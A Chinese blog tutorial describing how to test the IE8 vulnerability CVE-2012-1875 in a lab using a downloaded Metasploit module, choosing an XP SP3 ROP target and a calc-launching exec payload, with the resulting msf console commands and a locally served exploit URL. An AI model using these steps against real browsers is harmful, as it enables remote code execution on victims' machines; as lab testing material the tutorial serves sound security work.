天天看點

使用Metasploit測試最新的IE8漏洞(CVE-2012-1875)

        本來想使用Metasploit的控制台來測試,但是控制台怎麼也找不到這個exploit,暫不知道原因,後來使用msfgui來測試的。

        1、rb檔案下載下傳位址:http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb

        2、把下載下傳回來的rb檔案放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong檔案夾下面,你也可以不改名,或者放到已有的檔案夾下面,但是一定要放到exploits下面,你懂的。

        3、在msfgui界面上,使用File菜單Search選項,搜尋2012-1875,如圖,不出意外應該是可以搜尋到的啊!

使用Metasploit測試最新的IE8漏洞(CVE-2012-1875)

        4、選中搜到的條目,具體就是上面的magictong/cve-2012-1875 - Normal,然後點選Launch按鈕,進入配置頁面。

使用Metasploit測試最新的IE8漏洞(CVE-2012-1875)

        5、在配置頁面,首先選擇Targets,我的目标系統是xpsp3,我選擇了IE 8 on Windows XP SP3 with msvcrt ROP,因為這個漏洞要過DEP,是以利用會麻煩點。

使用Metasploit測試最新的IE8漏洞(CVE-2012-1875)

        6、然後選擇Payload,這裡選擇了exec,啟動calc(電腦)。SRVHOST裡面輸入本機(MSF所在的機器,不是有漏洞的機器,如果有漏洞機器就是MSF所在的機器,則輸入127.0.0.1即可)的區域網路IP,如果直接在本機測試,輸入127.0.0.1即可。

使用Metasploit測試最新的IE8漏洞(CVE-2012-1875)

        7、然後點選Run inConsole ,等待,直到msfgui的主界面下console TAB頁打出如下資訊:

msf  exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875

msf  exploit(cve-2012-1875) > set TARGET 1

TARGET => 1

msf  exploit(cve-2012-1875) > set PAYLOAD windows/exec

msf  exploit(cve-2012-1875) > set CMD calc

PAYLOAD => windows/exec

CMD => calc

msf  exploit(cve-2012-1875) > set SRVHOST 127.0.0.1

SRVHOST => 127.0.0.1

msf  exploit(cve-2012-1875) > exploit

[*] Exploit running as background job.

[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv

[*] Server started.

        8、現在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本機進行測試了。